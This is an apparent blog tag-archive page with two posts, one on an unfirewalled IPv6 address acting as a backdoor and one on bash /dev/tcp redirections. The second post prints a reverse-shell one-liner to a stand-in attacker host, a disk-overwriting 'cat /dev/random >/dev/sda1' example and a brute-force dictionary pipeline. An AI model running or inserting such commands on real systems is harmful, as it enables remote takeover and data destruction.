Tag Archives: Backdoor

IPv6 Backdoor for the Best and Worst!

BackdoorI’d like to come back to an issue I faced yesterday with one my servers. I think that this story could be a good example as part of an IPv6 awareness program…

One of my servers in my home lab runs several virtual machines. This server is reachable from outside via a VPN. On Sunday morning, I tried to access from a remote location and was ejected with a nice “connection timeout” for the SSH port. After some checks, the server looked to be ok, all the other services were running fine, the VM’s were working as expected. As I always bind sshd to a non-standard port, I tried the standard one (22) thinking about a misconfiguration. Same result… I tried from a another box in my LAN, same result. Than I realized that I upgraded the iptables rules installed on the server a few days before. Damned! Reboot the box? It won’t solve the issue as the rules will be automatically reloaded and could cause corruption of files used by the VMs! The only way to solve the problem would be to log via the console but I was far from home… In a corporate environment, an out-of-band access is common but not in this case!

Suddenly, an idea: I logged again on another box in my home LAN which is IPv6 enabled. And from this box, I tried to SSH into the server using his IPv6 address. Bingo! It worked. I successfully logged in and fixed the iptables rules to allow my SSH port again.

What to remember from this story? First, shame on me, my mistake (we all make mistakes) was to forget to enable the IPv6 firewall on the server. In this case, I was lucky and able to take again the control of the box. But, what in case of an real attacker? IPv6 is more and more deployed on networks and sometimes people are even not aware of this. Thanks to the auto-configuration enabled in most systems, devices will receive an IPv6 address and be reachable via both stacks!

This is not the first “bad” story that I faced with IPv6 (read here and here). IPv6 will become becomes a challenge in corporate environments. Keep this in mind!


/bin/bash Phone Home

ET Phone HomeI found UNIX a wonderful OS, whatever the flavors! I use it for 17 years and almost every week, I learn new stuffs. One of the particularities of UNIX is the way it communicate with devices. Except some specific devices, most of them are managed and visible as files or pseudo-files within the file system hierarchy. This is known as “everything’s a file“. Examples: /dev/null, /dev/random, /dev/stdin, /dev/stdout, /proc, etc. Some of those devices are always linked to the same file descriptor (or “FD“). stdin is “0”, stdout is “1” and stderr is “2”. Most devices accept standard system-calls like open(), clos(), read() an write(). Another particularity of UNIX is the primary user interface: the shell. There are plenty of shells; some of them are more oriented to developers, to high-skilled users etc. One of them is called “bash” and is available on most of the UNIX flavors, often as the default one. Most commands executed from your shell can take their input and output via pseudo files. Examples:

  bash# cat /dev/random >/dev/sda1
  bash# tar cvf archive.tar . >/dev/null
  bash# dd if=/dev/zero of=bigfile count=1000000

Very convenient! But bash implements something very interesting: the network redirections. It understands the following pseudo files: “/dev/tcp/host/port” and “/dev/udp/host/port“. An example?

First, we need to setup a “listener” on the destination host ( netcat is your best friend:

  root@destination# nc -l -p 8888

On the source host, bash will send packets to the listener:

  root@source# bash -c "echo Hello World" >/dev/tcp/

The listener will display:

  root@destination# nc -l -p 8888
  Hello World

Now the question will arise: when those network redirection could be helpful? First, bash can used without third party tools to grab data from the network. The example below fetch this blog main page:

  exec 5<> /dev/tcp/blog.rootshell.be/80
  printf "GET / HTTP/1.0nn" >&5
  cat <&5
  exec 5>&-

Very convenient if you don’t have link or curl installed. Just pipe the output to other commands. This can be used to generate dictionary files to conduct a bruteforce attack:

  exec 5<> /dev/tcp/blog.rootshell.be/80
  printf "GET / HTTP/1.0nn" >&5
  cat <&5
  exec 5>&- | sed -e 's/<[!a-zA-Z/][^>]*>//g' foo.tmp | tr " " "n"

Another nice example is to make bash “phone home”. Let’s launch a reverse shell to an attacker box:

  victim# bash 0</dev/tcp/www.attacker.com/8888 1>&0 2>&0

As the bash shell is very common, it can be very interesting! Just use your imagination. to find other examples. A final remark: this feature is not available on all pre-compiled or packaged bash instances! Some UNIX flavors consider it as dangerous (which is true!). If you want to compile your own bash with this feature enabled, the configuration flag is “–enable-net-redirections“.